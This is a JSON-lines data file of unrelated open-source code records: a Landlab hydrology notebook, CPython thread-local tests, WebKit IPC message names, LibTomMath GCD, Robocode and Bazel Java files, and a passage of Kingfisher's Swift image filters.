\"\\n\",\n \"The slope length is the distance from the bottom edge of the bottom-most row of cells, to the top edge of the top-most row of cells. The base row of nodes are at y = 0, and the cell edges start half a cell width up from that, so y = 5 m. The top of the upper-most row of cells is half a cell width below the top grid edge, which is 610 m, so the top of the cells is 605 m. Hence the interior (cell) portion of the grid is 600 m long.\\n\",\n \"\\n\",\n \"Hence, discharge out the bottom should be 100 mm/hr x 600 m = 0.1 m/hr x 600 m = 60 m2/hr. Let's convert this to m2/s:\"\n ]\n },\n {\n \"cell_type\": \"code\",\n \"execution_count\": null,\n \"metadata\": {},\n \"outputs\": [],\n \"source\": [\n \"q_out = 0.1 * 600 / 3600.0\\n\",\n \"q_out\"\n ]\n },\n {\n \"cell_type\": \"markdown\",\n \"metadata\": {},\n \"source\": [\n \"The water depth should be just sufficient to carry this discharge with the given slope and roughness. We get this by inverting the Manning equation:\\n\",\n \"\\n\",\n \"$$q = (1/n) H^{5/3} S^{1/2}$$\\n\",\n \"\\n\",\n \"$$H^{5/3} = n q S^{-1/2}$$\\n\",\n \"\\n\",\n \"$$H = (n q)^{3/5} S^{-3/10}$$\\n\",\n \"\\n\",\n \"The slope gradient is 0.01 (because we set elevation to be 0.01 times the y coordinate). The discharge, as we've already established, is about 0.0167 m2/s, and the roughness is 0.01 (the default value). Therefore,\"\n ]\n },\n {\n \"cell_type\": \"code\",\n \"execution_count\": null,\n \"metadata\": {},\n \"outputs\": [],\n \"source\": [\n \"n = 0.01\\n\",\n \"q = 0.0167\\n\",\n \"S = 0.01\\n\",\n \"H_out = (n * q) ** 0.6 * S ** -0.3\\n\",\n \"H_out\"\n ]\n },\n {\n \"cell_type\": \"code\",\n \"execution_count\": null,\n \"metadata\": {},\n \"outputs\": [],\n \"source\": [\n \"imshow_grid(rg, \\\"surface_water__depth\\\", cmap=\\\"Blues\\\")\"\n ]\n },\n {\n \"cell_type\": \"markdown\",\n \"metadata\": {},\n \"source\": [\n \"This looks pretty good. 
Let's check the values:\"\n ]\n },\n {\n \"cell_type\": \"code\",\n \"execution_count\": null,\n \"metadata\": {},\n \"outputs\": [],\n \"source\": [\n \"rg.at_node[\\\"surface_water__depth\\\"][42:84] # bottom row of core nodes\"\n ]\n },\n {\n \"cell_type\": \"markdown\",\n \"metadata\": {},\n \"source\": [\n \"We see that the depth agrees with the analytical solution to within three decimal places: not bad. Ideally, we would build the above tests into the component as doctests or unit tests. We could also test the transient solutions: rising hydrograph, falling hydrograph. Finally, we haven't tested all the ingredients; for example, we haven't tested what happens when infiltration rate is greater than zero.\\n\",\n \"\\n\",\n \"Nonetheless, the above example illustrates the basics of component-making. A great next step would be to create a unit test based on this example.\"\n ]\n },\n {\n \"cell_type\": \"markdown\",\n \"metadata\": {},\n \"source\": [\n \"### Click here for more [Landlab tutorials](https://landlab.readthedocs.io/en/latest/user_guide/tutorials.html)\"\n ]\n }\n ],\n \"metadata\": {\n \"kernelspec\": {\n \"display_name\": \"Python 3\",\n \"language\": \"python\",\n \"name\": \"python3\"\n },\n \"language_info\": {\n \"codemirror_mode\": {\n \"name\": \"ipython\",\n \"version\": 3\n },\n \"file_extension\": \".py\",\n \"mimetype\": \"text/x-python\",\n \"name\": \"python\",\n \"nbconvert_exporter\": \"python\",\n \"pygments_lexer\": \"ipython3\",\n \"version\": \"3.8.1\"\n }\n },\n \"nbformat\": 4,\n \"nbformat_minor\": 1\n}\n"} {"text": "import unittest\nfrom doctest import DocTestSuite\nfrom test import support\nimport weakref\nimport gc\n\n# Modules under test\n_thread = support.import_module('_thread')\nthreading = support.import_module('threading')\nimport _threading_local\n\n\nclass Weak(object):\n pass\n\ndef target(local, weaklist):\n weak = Weak()\n local.weak = weak\n weaklist.append(weakref.ref(weak))\n\n\nclass BaseLocalTest:\n\n def test_local_refs(self):\n self._local_refs(20)\n self._local_refs(50)\n self._local_refs(100)\n\n def _local_refs(self, n):\n local = self._local()\n weaklist = []\n for i in range(n):\n t = threading.Thread(target=target, args=(local, weaklist))\n t.start()\n t.join()\n del t\n\n gc.collect()\n self.assertEqual(len(weaklist), n)\n\n # XXX _threading_local keeps the local of the last stopped thread alive.\n deadlist = [weak for weak in weaklist if weak() is None]\n self.assertIn(len(deadlist), (n-1, n))\n\n # Assignment to the same thread local frees it sometimes (!)\n local.someothervar = None\n gc.collect()\n deadlist = [weak for weak in weaklist if weak() is None]\n self.assertIn(len(deadlist), (n-1, n), (n, len(deadlist)))\n\n def test_derived(self):\n # Issue 3088: if there is a threads switch inside the __init__\n # of a threading.local derived class, the per-thread dictionary\n # is created but not correctly set on the object.\n # The first member set may be bogus.\n import time\n class Local(self._local):\n def __init__(self):\n time.sleep(0.01)\n local = Local()\n\n def f(i):\n local.x = i\n # Simply check that the variable is correctly set\n self.assertEqual(local.x, i)\n\n with support.start_threads(threading.Thread(target=f, args=(i,))\n for i in range(10)):\n pass\n\n def test_derived_cycle_dealloc(self):\n # http://bugs.python.org/issue6990\n class Local(self._local):\n pass\n locals = None\n passed = False\n e1 = threading.Event()\n e2 = threading.Event()\n\n def f():\n nonlocal passed\n # 1) Involve Local in a 
cycle\n cycle = [Local()]\n cycle.append(cycle)\n cycle[0].foo = 'bar'\n\n # 2) GC the cycle (triggers threadmodule.c::local_clear\n # before local_dealloc)\n del cycle\n gc.collect()\n e1.set()\n e2.wait()\n\n # 4) New Locals should be empty\n passed = all(not hasattr(local, 'foo') for local in locals)\n\n t = threading.Thread(target=f)\n t.start()\n e1.wait()\n\n # 3) New Locals should recycle the original's address. Creating\n # them in the thread overwrites the thread state and avoids the\n # bug\n locals = [Local() for i in range(10)]\n e2.set()\n t.join()\n\n self.assertTrue(passed)\n\n def test_arguments(self):\n # Issue 1522237\n class MyLocal(self._local):\n def __init__(self, *args, **kwargs):\n pass\n\n MyLocal(a=1)\n MyLocal(1)\n self.assertRaises(TypeError, self._local, a=1)\n self.assertRaises(TypeError, self._local, 1)\n\n def _test_one_class(self, c):\n self._failed = \"No error message set or cleared.\"\n obj = c()\n e1 = threading.Event()\n e2 = threading.Event()\n\n def f1():\n obj.x = 'foo'\n obj.y = 'bar'\n del obj.y\n e1.set()\n e2.wait()\n\n def f2():\n try:\n foo = obj.x\n except AttributeError:\n # This is expected -- we haven't set obj.x in this thread yet!\n self._failed = \"\" # passed\n else:\n self._failed = ('Incorrectly got value %r from class %r\\n' %\n (foo, c))\n sys.stderr.write(self._failed)\n\n t1 = threading.Thread(target=f1)\n t1.start()\n e1.wait()\n t2 = threading.Thread(target=f2)\n t2.start()\n t2.join()\n # The test is done; just let t1 know it can exit, and wait for it.\n e2.set()\n t1.join()\n\n self.assertFalse(self._failed, self._failed)\n\n def test_threading_local(self):\n self._test_one_class(self._local)\n\n def test_threading_local_subclass(self):\n class LocalSubclass(self._local):\n \"\"\"To test that subclasses behave properly.\"\"\"\n self._test_one_class(LocalSubclass)\n\n def _test_dict_attribute(self, cls):\n obj = cls()\n obj.x = 5\n self.assertEqual(obj.__dict__, {'x': 5})\n with self.assertRaises(AttributeError):\n obj.__dict__ = {}\n with self.assertRaises(AttributeError):\n del obj.__dict__\n\n def test_dict_attribute(self):\n self._test_dict_attribute(self._local)\n\n def test_dict_attribute_subclass(self):\n class LocalSubclass(self._local):\n \"\"\"To test that subclasses behave properly.\"\"\"\n self._test_dict_attribute(LocalSubclass)\n\n def test_cycle_collection(self):\n class X:\n pass\n\n x = X()\n x.local = self._local()\n x.local.x = x\n wr = weakref.ref(x)\n del x\n gc.collect()\n self.assertIs(wr(), None)\n\n\nclass ThreadLocalTest(unittest.TestCase, BaseLocalTest):\n _local = _thread._local\n\nclass PyThreadingLocalTest(unittest.TestCase, BaseLocalTest):\n _local = _threading_local.local\n\n\ndef test_main():\n suite = unittest.TestSuite()\n suite.addTest(DocTestSuite('_threading_local'))\n suite.addTest(unittest.makeSuite(ThreadLocalTest))\n suite.addTest(unittest.makeSuite(PyThreadingLocalTest))\n\n local_orig = _threading_local.local\n def setUp(test):\n _threading_local.local = _thread._local\n def tearDown(test):\n _threading_local.local = local_orig\n suite.addTest(DocTestSuite('_threading_local',\n setUp=setUp, tearDown=tearDown)\n )\n\n support.run_unittest(suite)\n\nif __name__ == '__main__':\n test_main()\n"} {"text": "/*\n * Copyright (C) 2010-2020 Apple Inc. All rights reserved.\n *\n * Redistribution and use in source and binary forms, with or without\n * modification, are permitted provided that the following conditions\n * are met:\n * 1. 
Redistributions of source code must retain the above copyright\n * notice, this list of conditions and the following disclaimer.\n * 2. Redistributions in binary form must reproduce the above copyright\n * notice, this list of conditions and the following disclaimer in the\n * documentation and/or other materials provided with the distribution.\n *\n * THIS SOFTWARE IS PROVIDED BY APPLE INC. AND ITS CONTRIBUTORS ``AS IS'' AND\n * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n * WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n * DISCLAIMED. IN NO EVENT SHALL APPLE INC. OR ITS CONTRIBUTORS BE LIABLE FOR\n * ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\n * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\n * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\n * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,\n * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\n * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n */\n\n#include \"config.h\"\n#include \"MessageNames.h\"\n\nnamespace IPC {\n\nconst char* description(MessageName name)\n{\n switch (name) {\n case MessageName::WebPage_AddEvent:\n return \"WebPage_AddEvent\";\n case MessageName::WebPage_Close:\n return \"WebPage_Close\";\n case MessageName::WebPage_CreatePlugin:\n return \"WebPage_CreatePlugin\";\n case MessageName::WebPage_DeprecatedOperation:\n return \"WebPage_DeprecatedOperation\";\n case MessageName::WebPage_DidCreateWebProcessConnection:\n return \"WebPage_DidCreateWebProcessConnection\";\n case MessageName::WebPage_DidReceivePolicyDecision:\n return \"WebPage_DidReceivePolicyDecision\";\n case MessageName::WebPage_ExperimentalOperation:\n return \"WebPage_ExperimentalOperation\";\n case MessageName::WebPage_GetPluginProcessConnection:\n return \"WebPage_GetPluginProcessConnection\";\n case MessageName::WebPage_GetPlugins:\n return \"WebPage_GetPlugins\";\n case MessageName::WebPage_InterpretKeyEvent:\n return \"WebPage_InterpretKeyEvent\";\n case MessageName::WebPage_LoadSomething:\n return \"WebPage_LoadSomething\";\n case MessageName::WebPage_LoadSomethingElse:\n return \"WebPage_LoadSomethingElse\";\n case MessageName::WebPage_LoadURL:\n return \"WebPage_LoadURL\";\n case MessageName::WebPage_PreferencesDidChange:\n return \"WebPage_PreferencesDidChange\";\n case MessageName::WebPage_RunJavaScriptAlert:\n return \"WebPage_RunJavaScriptAlert\";\n case MessageName::WebPage_SendDoubleAndFloat:\n return \"WebPage_SendDoubleAndFloat\";\n case MessageName::WebPage_SendInts:\n return \"WebPage_SendInts\";\n case MessageName::WebPage_SetVideoLayerID:\n return \"WebPage_SetVideoLayerID\";\n case MessageName::WebPage_TemplateTest:\n return \"WebPage_TemplateTest\";\n case MessageName::WebPage_TestAsyncMessage:\n return \"WebPage_TestAsyncMessage\";\n case MessageName::WebPage_TestAsyncMessageReply:\n return \"WebPage_TestAsyncMessageReply\";\n case MessageName::WebPage_TestAsyncMessageWithConnection:\n return \"WebPage_TestAsyncMessageWithConnection\";\n case MessageName::WebPage_TestAsyncMessageWithConnectionReply:\n return \"WebPage_TestAsyncMessageWithConnectionReply\";\n case MessageName::WebPage_TestAsyncMessageWithMultipleArguments:\n return \"WebPage_TestAsyncMessageWithMultipleArguments\";\n case MessageName::WebPage_TestAsyncMessageWithMultipleArgumentsReply:\n return 
\"WebPage_TestAsyncMessageWithMultipleArgumentsReply\";\n case MessageName::WebPage_TestAsyncMessageWithNoArguments:\n return \"WebPage_TestAsyncMessageWithNoArguments\";\n case MessageName::WebPage_TestAsyncMessageWithNoArgumentsReply:\n return \"WebPage_TestAsyncMessageWithNoArgumentsReply\";\n case MessageName::WebPage_TestMultipleAttributes:\n return \"WebPage_TestMultipleAttributes\";\n case MessageName::WebPage_TestParameterAttributes:\n return \"WebPage_TestParameterAttributes\";\n case MessageName::WebPage_TestSyncMessage:\n return \"WebPage_TestSyncMessage\";\n case MessageName::WebPage_TestSynchronousMessage:\n return \"WebPage_TestSynchronousMessage\";\n case MessageName::WebPage_TouchEvent:\n return \"WebPage_TouchEvent\";\n case MessageName::WrappedAsyncMessageForTesting:\n return \"IPC::WrappedAsyncMessageForTesting\";\n case MessageName::SyncMessageReply:\n return \"IPC::SyncMessageReply\";\n case MessageName::InitializeConnection:\n return \"IPC::InitializeConnection\";\n case MessageName::LegacySessionState:\n return \"IPC::LegacySessionState\";\n }\n ASSERT_NOT_REACHED();\n return \"\";\n}\n\nReceiverName receiverName(MessageName messageName)\n{\n switch (messageName) {\n case MessageName::WebPage_AddEvent:\n case MessageName::WebPage_Close:\n case MessageName::WebPage_CreatePlugin:\n case MessageName::WebPage_DeprecatedOperation:\n case MessageName::WebPage_DidCreateWebProcessConnection:\n case MessageName::WebPage_DidReceivePolicyDecision:\n case MessageName::WebPage_ExperimentalOperation:\n case MessageName::WebPage_GetPluginProcessConnection:\n case MessageName::WebPage_GetPlugins:\n case MessageName::WebPage_InterpretKeyEvent:\n case MessageName::WebPage_LoadSomething:\n case MessageName::WebPage_LoadSomethingElse:\n case MessageName::WebPage_LoadURL:\n case MessageName::WebPage_PreferencesDidChange:\n case MessageName::WebPage_RunJavaScriptAlert:\n case MessageName::WebPage_SendDoubleAndFloat:\n case MessageName::WebPage_SendInts:\n case MessageName::WebPage_SetVideoLayerID:\n case MessageName::WebPage_TemplateTest:\n case MessageName::WebPage_TestMultipleAttributes:\n case MessageName::WebPage_TestParameterAttributes:\n case MessageName::WebPage_TouchEvent:\n return ReceiverName::WebPage;\n case MessageName::WebPage_TestAsyncMessageReply:\n case MessageName::WebPage_TestAsyncMessageWithConnectionReply:\n case MessageName::WebPage_TestAsyncMessageWithMultipleArgumentsReply:\n case MessageName::WebPage_TestAsyncMessageWithNoArgumentsReply:\n return ReceiverName::AsyncReply;\n case MessageName::WrappedAsyncMessageForTesting:\n case MessageName::SyncMessageReply:\n case MessageName::InitializeConnection:\n case MessageName::LegacySessionState:\n return ReceiverName::IPC;\n }\n ASSERT_NOT_REACHED();\n return ReceiverName::Invalid;\n}\n\nbool isValidMessageName(MessageName messageName)\n{\n if (messageName == IPC::MessageName::WebPage_LoadURL)\n return true;\n#if ENABLE(TEST_FEATURE)\n if (messageName == IPC::MessageName::WebPage_TestAsyncMessage)\n return true;\n if (messageName == IPC::MessageName::WebPage_TestAsyncMessageReply)\n return true;\n#endif\n#if ENABLE(TEST_FEATURE)\n if (messageName == IPC::MessageName::WebPage_TestAsyncMessageWithNoArguments)\n return true;\n if (messageName == IPC::MessageName::WebPage_TestAsyncMessageWithNoArgumentsReply)\n return true;\n#endif\n#if ENABLE(TEST_FEATURE)\n if (messageName == IPC::MessageName::WebPage_TestAsyncMessageWithMultipleArguments)\n return true;\n if (messageName == 
IPC::MessageName::WebPage_TestAsyncMessageWithMultipleArgumentsReply)\n return true;\n#endif\n#if ENABLE(TEST_FEATURE)\n if (messageName == IPC::MessageName::WebPage_TestAsyncMessageWithConnection)\n return true;\n if (messageName == IPC::MessageName::WebPage_TestAsyncMessageWithConnectionReply)\n return true;\n#endif\n if (messageName == IPC::MessageName::WebPage_TestSyncMessage)\n return true;\n if (messageName == IPC::MessageName::WebPage_TestSynchronousMessage)\n return true;\n if (messageName == IPC::MessageName::WebPage_LoadURL)\n return true;\n#if ENABLE(TOUCH_EVENTS)\n if (messageName == IPC::MessageName::WebPage_LoadSomething)\n return true;\n#endif\n#if (ENABLE(TOUCH_EVENTS) && (NESTED_MESSAGE_CONDITION || SOME_OTHER_MESSAGE_CONDITION))\n if (messageName == IPC::MessageName::WebPage_TouchEvent)\n return true;\n#endif\n#if (ENABLE(TOUCH_EVENTS) && (NESTED_MESSAGE_CONDITION && SOME_OTHER_MESSAGE_CONDITION))\n if (messageName == IPC::MessageName::WebPage_AddEvent)\n return true;\n#endif\n#if ENABLE(TOUCH_EVENTS)\n if (messageName == IPC::MessageName::WebPage_LoadSomethingElse)\n return true;\n#endif\n if (messageName == IPC::MessageName::WebPage_DidReceivePolicyDecision)\n return true;\n if (messageName == IPC::MessageName::WebPage_Close)\n return true;\n if (messageName == IPC::MessageName::WebPage_PreferencesDidChange)\n return true;\n if (messageName == IPC::MessageName::WebPage_SendDoubleAndFloat)\n return true;\n if (messageName == IPC::MessageName::WebPage_SendInts)\n return true;\n if (messageName == IPC::MessageName::WebPage_CreatePlugin)\n return true;\n if (messageName == IPC::MessageName::WebPage_RunJavaScriptAlert)\n return true;\n if (messageName == IPC::MessageName::WebPage_GetPlugins)\n return true;\n if (messageName == IPC::MessageName::WebPage_GetPluginProcessConnection)\n return true;\n if (messageName == IPC::MessageName::WebPage_TestMultipleAttributes)\n return true;\n if (messageName == IPC::MessageName::WebPage_TestParameterAttributes)\n return true;\n if (messageName == IPC::MessageName::WebPage_TemplateTest)\n return true;\n if (messageName == IPC::MessageName::WebPage_SetVideoLayerID)\n return true;\n#if PLATFORM(MAC)\n if (messageName == IPC::MessageName::WebPage_DidCreateWebProcessConnection)\n return true;\n#endif\n#if PLATFORM(MAC)\n if (messageName == IPC::MessageName::WebPage_InterpretKeyEvent)\n return true;\n#endif\n#if ENABLE(DEPRECATED_FEATURE)\n if (messageName == IPC::MessageName::WebPage_DeprecatedOperation)\n return true;\n#endif\n#if ENABLE(EXPERIMENTAL_FEATURE)\n if (messageName == IPC::MessageName::WebPage_ExperimentalOperation)\n return true;\n#endif\n if (messageName == IPC::MessageName::WebPage_LoadURL)\n return true;\n#if ENABLE(TOUCH_EVENTS)\n if (messageName == IPC::MessageName::WebPage_LoadSomething)\n return true;\n#endif\n#if (ENABLE(TOUCH_EVENTS) && (NESTED_MESSAGE_CONDITION || SOME_OTHER_MESSAGE_CONDITION))\n if (messageName == IPC::MessageName::WebPage_TouchEvent)\n return true;\n#endif\n#if (ENABLE(TOUCH_EVENTS) && (NESTED_MESSAGE_CONDITION && SOME_OTHER_MESSAGE_CONDITION))\n if (messageName == IPC::MessageName::WebPage_AddEvent)\n return true;\n#endif\n#if ENABLE(TOUCH_EVENTS)\n if (messageName == IPC::MessageName::WebPage_LoadSomethingElse)\n return true;\n#endif\n if (messageName == IPC::MessageName::WebPage_DidReceivePolicyDecision)\n return true;\n if (messageName == IPC::MessageName::WebPage_Close)\n return true;\n if (messageName == IPC::MessageName::WebPage_PreferencesDidChange)\n return true;\n if (messageName == 
IPC::MessageName::WebPage_SendDoubleAndFloat)\n return true;\n if (messageName == IPC::MessageName::WebPage_SendInts)\n return true;\n if (messageName == IPC::MessageName::WebPage_CreatePlugin)\n return true;\n if (messageName == IPC::MessageName::WebPage_RunJavaScriptAlert)\n return true;\n if (messageName == IPC::MessageName::WebPage_GetPlugins)\n return true;\n if (messageName == IPC::MessageName::WebPage_GetPluginProcessConnection)\n return true;\n if (messageName == IPC::MessageName::WebPage_TestMultipleAttributes)\n return true;\n if (messageName == IPC::MessageName::WebPage_TestParameterAttributes)\n return true;\n if (messageName == IPC::MessageName::WebPage_TemplateTest)\n return true;\n if (messageName == IPC::MessageName::WebPage_SetVideoLayerID)\n return true;\n#if PLATFORM(MAC)\n if (messageName == IPC::MessageName::WebPage_DidCreateWebProcessConnection)\n return true;\n#endif\n#if PLATFORM(MAC)\n if (messageName == IPC::MessageName::WebPage_InterpretKeyEvent)\n return true;\n#endif\n#if ENABLE(DEPRECATED_FEATURE)\n if (messageName == IPC::MessageName::WebPage_DeprecatedOperation)\n return true;\n#endif\n#if ENABLE(EXPERIMENTAL_FEATURE)\n if (messageName == IPC::MessageName::WebPage_ExperimentalOperation)\n return true;\n#endif\n if (messageName == IPC::MessageName::WrappedAsyncMessageForTesting)\n return true;\n if (messageName == IPC::MessageName::SyncMessageReply)\n return true;\n if (messageName == IPC::MessageName::InitializeConnection)\n return true;\n if (messageName == IPC::MessageName::LegacySessionState)\n return true;\n return false;\n};\n\n} // namespace IPC\n"} {"text": "version https://git-lfs.github.com/spec/v1\noid sha256:51b316ed411dd2664185e042b3c6e100ddf32830eee4401923b575960522a82a\nsize 19419\n"} {"text": "#include \"tommath_private.h\"\n#ifdef BN_MP_GCD_C\n/* LibTomMath, multiple-precision integer library -- Tom St Denis */\n/* SPDX-License-Identifier: Unlicense */\n\n/* Greatest Common Divisor using the binary method */\nmp_err mp_gcd(const mp_int *a, const mp_int *b, mp_int *c)\n{\n mp_int u, v;\n int k, u_lsb, v_lsb;\n mp_err err;\n\n /* either zero than gcd is the largest */\n if (MP_IS_ZERO(a)) {\n return mp_abs(b, c);\n }\n if (MP_IS_ZERO(b)) {\n return mp_abs(a, c);\n }\n\n /* get copies of a and b we can modify */\n if ((err = mp_init_copy(&u, a)) != MP_OKAY) {\n return err;\n }\n\n if ((err = mp_init_copy(&v, b)) != MP_OKAY) {\n goto LBL_U;\n }\n\n /* must be positive for the remainder of the algorithm */\n u.sign = v.sign = MP_ZPOS;\n\n /* B1. 
Find the common power of two for u and v */\n u_lsb = mp_cnt_lsb(&u);\n v_lsb = mp_cnt_lsb(&v);\n k = MP_MIN(u_lsb, v_lsb);\n\n if (k > 0) {\n /* divide the power of two out */\n if ((err = mp_div_2d(&u, k, &u, NULL)) != MP_OKAY) {\n goto LBL_V;\n }\n\n if ((err = mp_div_2d(&v, k, &v, NULL)) != MP_OKAY) {\n goto LBL_V;\n }\n }\n\n /* divide any remaining factors of two out */\n if (u_lsb != k) {\n if ((err = mp_div_2d(&u, u_lsb - k, &u, NULL)) != MP_OKAY) {\n goto LBL_V;\n }\n }\n\n if (v_lsb != k) {\n if ((err = mp_div_2d(&v, v_lsb - k, &v, NULL)) != MP_OKAY) {\n goto LBL_V;\n }\n }\n\n while (!MP_IS_ZERO(&v)) {\n /* make sure v is the largest */\n if (mp_cmp_mag(&u, &v) == MP_GT) {\n /* swap u and v to make sure v is >= u */\n mp_exch(&u, &v);\n }\n\n /* subtract smallest from largest */\n if ((err = s_mp_sub(&v, &u, &v)) != MP_OKAY) {\n goto LBL_V;\n }\n\n /* Divide out all factors of two */\n if ((err = mp_div_2d(&v, mp_cnt_lsb(&v), &v, NULL)) != MP_OKAY) {\n goto LBL_V;\n }\n }\n\n /* multiply by 2**k which we divided out at the beginning */\n if ((err = mp_mul_2d(&u, k, c)) != MP_OKAY) {\n goto LBL_V;\n }\n c->sign = MP_ZPOS;\n err = MP_OKAY;\nLBL_V:\n mp_clear(&u);\nLBL_U:\n mp_clear(&v);\n return err;\n}\n#endif\n"} {"text": "/**\r\n * Copyright (c) 2001-2020 Mathew A. Nelson and Robocode contributors\r\n * All rights reserved. This program and the accompanying materials\r\n * are made available under the terms of the Eclipse Public License v1.0\r\n * which accompanies this distribution, and is available at\r\n * https://robocode.sourceforge.io/license/epl-v10.html\r\n */\r\n// ------------------------------------------------------------------------------\r\n// \r\n// This code was generated by jni4net. See http://jni4net.sourceforge.net/ \r\n// \r\n// Changes to this file may cause incorrect behavior and will be lost if \r\n// the code is regenerated.\r\n// \r\n// ------------------------------------------------------------------------------\r\n\r\npackage robocode.control.events;\r\n\r\n@net.sf.jni4net.attributes.ClrTypeInfo\r\npublic final class BattleFinishedEvent_ {\r\n \r\n //\r\n private static system.Type staticType;\r\n \r\n public static system.Type typeof() {\r\n return robocode.control.events.BattleFinishedEvent_.staticType;\r\n }\r\n \r\n private static void InitJNI(net.sf.jni4net.inj.INJEnv env, system.Type staticType) {\r\n robocode.control.events.BattleFinishedEvent_.staticType = staticType;\r\n }\r\n //\r\n}\r\n"} {"text": "/*\n * Copyright 2017 The Bazel Authors. 
All rights reserved.\n *\n * Licensed under the Apache License, Version 2.0 (the \"License\");\n * you may not use this file except in compliance with the License.\n * You may obtain a copy of the License at\n *\n * http://www.apache.org/licenses/LICENSE-2.0\n *\n * Unless required by applicable law or agreed to in writing, software\n * distributed under the License is distributed on an \"AS IS\" BASIS,\n * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n * See the License for the specific language governing permissions and\n * limitations under the License.\n */\npackage com.google.idea.blaze.aspect.java.filteredgenjar;\n\nimport static com.google.common.truth.Truth.assertThat;\n\nimport com.google.devtools.intellij.IntellijAspectTestFixtureOuterClass.IntellijAspectTestFixture;\nimport com.google.devtools.intellij.ideinfo.IntellijIdeInfo.TargetIdeInfo;\nimport com.google.idea.blaze.BazelIntellijAspectTest;\nimport org.junit.Test;\nimport org.junit.runner.RunWith;\nimport org.junit.runners.JUnit4;\n\n/** Tests the filtered gen-jar functionality */\n@RunWith(JUnit4.class)\npublic class FilteredGenJarTest extends BazelIntellijAspectTest {\n\n @Test\n public void testFilteredGenJarNotCreatedForSourceOnlyRule() throws Exception {\n IntellijAspectTestFixture testFixture = loadTestFixture(\":source_only_fixture\");\n TargetIdeInfo targetIdeInfo = findTarget(testFixture, \":source_only\");\n assertThat(targetIdeInfo.getJavaIdeInfo().hasFilteredGenJar()).isFalse();\n }\n\n @Test\n public void testFilteredGenJarNotCreatedForOnlyGenRule() throws Exception {\n IntellijAspectTestFixture testFixture = loadTestFixture(\":gen_only_fixture\");\n TargetIdeInfo targetIdeInfo = findTarget(testFixture, \":gen_only\");\n assertThat(targetIdeInfo.getJavaIdeInfo().hasFilteredGenJar()).isFalse();\n }\n\n @Test\n public void testFilteredGenJar() throws Exception {\n IntellijAspectTestFixture testFixture = loadTestFixture(\":mixed_fixture\");\n TargetIdeInfo targetIdeInfo = findTarget(testFixture, \":mixed\");\n assertThat(targetIdeInfo.getJavaIdeInfo().hasFilteredGenJar()).isTrue();\n assertThat(targetIdeInfo.getJavaIdeInfo().getFilteredGenJar().getJar().getRelativePath())\n .isEqualTo(testRelative(\"mixed-filtered-gen.jar\"));\n assertThat(targetIdeInfo.getJavaIdeInfo().getFilteredGenJar().getSourceJar().getRelativePath())\n .isEqualTo(testRelative(\"mixed-filtered-gen-src.jar\"));\n }\n}\n"} {"text": "//\n// Filter.swift\n// Kingfisher\n//\n// Created by Wei Wang on 2016/08/31.\n//\n// Copyright (c) 2018 Wei Wang \n//\n// Permission is hereby granted, free of charge, to any person obtaining a copy\n// of this software and associated documentation files (the \"Software\"), to deal\n// in the Software without restriction, including without limitation the rights\n// to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n// copies of the Software, and to permit persons to whom the Software is\n// furnished to do so, subject to the following conditions:\n//\n// The above copyright notice and this permission notice shall be included in\n// all copies or substantial portions of the Software.\n//\n// THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n// IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n// FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE\n// AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n// LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n// OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n// THE SOFTWARE.\n\n\n\nimport CoreImage\nimport Accelerate\n\n// Reuse the same CI Context for all CI drawing.\nprivate let ciContext = CIContext(options: nil)\n\n/// Transformer method which will be used in to provide a `Filter`.\npublic typealias Transformer = (CIImage) -> CIImage?\n\n/// Supply a filter to create an `ImageProcessor`.\npublic protocol CIImageProcessor: ImageProcessor {\n var filter: Filter { get }\n}\n\nextension CIImageProcessor {\n public func process(item: ImageProcessItem, options: KingfisherOptionsInfo) -> Image? {\n switch item {\n case .image(let image):\n return image.kf.apply(filter)\n case .data(_):\n return (DefaultImageProcessor.default >> self).process(item: item, options: options)\n }\n }\n}\n\n/// Wrapper for a `Transformer` of CIImage filters.\npublic struct Filter {\n \n let transform: Transformer\n\n public init(tranform: @escaping Transformer) {\n self.transform = tranform\n }\n \n /// Tint filter which will apply a tint color to images.\n public static var tint: (Color) -> Filter = {\n color in\n Filter { input in\n let colorFilter = CIFilter(name: \"CIConstantColorGenerator\")!\n colorFilter.setValue(CIColor(color: color), forKey: kCIInputColorKey)\n \n let colorImage = colorFilter.outputImage\n let filter = CIFilter(name: \"CISourceOverCompositing\")!\n filter.setValue(colorImage, forKey: kCIInputImageKey)\n filter.setValue(input, forKey: kCIInputBackgroundImageKey)\n #if swift(>=4.0)\n return filter.outputImage?.cropped(to: input.extent)\n #else\n return filter.outputImage?.cropping(to: input.extent)\n #endif\n }\n }\n \n public typealias ColorElement = (CGFloat, CGFloat, CGFloat, CGFloat)\n \n /// Color control filter which will apply color control change to images.\n public static var colorControl: (ColorElement) -> Filter = { arg -> Filter in\n let (brightness, contrast, saturation, inputEV) = arg\n return Filter { input in\n let paramsColor = [kCIInputBrightnessKey: brightness,\n kCIInputContrastKey: contrast,\n kCIInputSaturationKey: saturation]\n \n let paramsExposure = [kCIInputEVKey: inputEV]\n #if swift(>=4.0)\n let blackAndWhite = input.applyingFilter(\"CIColorControls\", parameters: paramsColor)\n return blackAndWhite.applyingFilter(\"CIExposureAdjust\", parameters: paramsExposure)\n #else\n let blackAndWhite = input.applyingFilter(\"CIColorControls\", withInputParameters: paramsColor)\n return 